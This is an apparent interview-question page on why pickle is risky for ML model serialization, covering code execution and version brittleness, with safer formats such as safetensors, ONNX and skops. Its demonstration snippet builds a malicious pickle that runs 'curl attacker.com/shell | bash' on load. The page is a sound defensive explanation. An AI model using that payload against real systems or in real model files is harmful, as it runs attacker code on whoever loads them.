MLOps Medium Asked at AmazonAsked at GoogleAsked at Hugging Face

What are the security and compatibility risks of using pickle for model serialization, and what are the safer alternatives?

For MLOps Engineer ML Engineer AI / LLM Engineer

The short answer

Pickle executes arbitrary Python bytecode during deserialization, so loading an untrusted pickle file is equivalent to running arbitrary code on your machine. Beyond security, pickle artifacts are tightly coupled to the exact Python and library versions used to create them, making them fragile across environments.

How to think about it

Python’s pickle module is the default serialization for scikit-learn models, and PyTorch’s torch.save uses it under the hood. Its convenience hides two fundamental problems.

Security: arbitrary code execution

Pickle works by storing Python opcodes that are replayed on load. A malicious actor can craft a pickle file that calls os.system, exfiltrates secrets, or installs a backdoor — all triggered by a single joblib.load("model.pkl"). This is not a theoretical risk; it has been demonstrated repeatedly in ML supply chain attacks.

# Demonstration of the risk — NEVER run untrusted pickles
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl attacker.com/shell | bash",))

payload = pickle.dumps(Exploit())
pickle.loads(payload)   # executes the command on load

Compatibility: brittle across versions

A pickle created with sklearn 1.3 may fail to load with sklearn 1.5 because internal class paths or attribute names changed. The same pickle created on Python 3.10 can fail on Python 3.12 due to protocol differences.

Safer alternatives by use case:

Use case	Format	Tool
Cross-framework inference	ONNX	`torch.onnx.export`, `tf2onnx`
Tree models (XGBoost, LightGBM)	Native JSON/binary	`model.save_model("model.json")`
PyTorch weights only	`state_dict` + JSON config	`torch.save(model.state_dict(), ...)`
Scikit-learn pipelines	skops	`skops.io.dump`
Hugging Face models	safetensors	`model.save_pretrained(...)`

# Safer: save PyTorch state dict + separate config
import torch, json

torch.save(model.state_dict(), "weights.pt")
json.dump(model_config, open("config.json", "w"))

# Load: reconstruct architecture first, then load weights
model = MyModel(**json.load(open("config.json")))
model.load_state_dict(torch.load("weights.pt", weights_only=True))

The weights_only=True flag (PyTorch 2.0+) restricts the unpickler to tensor data only, blocking arbitrary code execution.

What are the security and compatibility risks of using pickle for model serialization, and what are the safer alternatives?

Keep practising

Explore further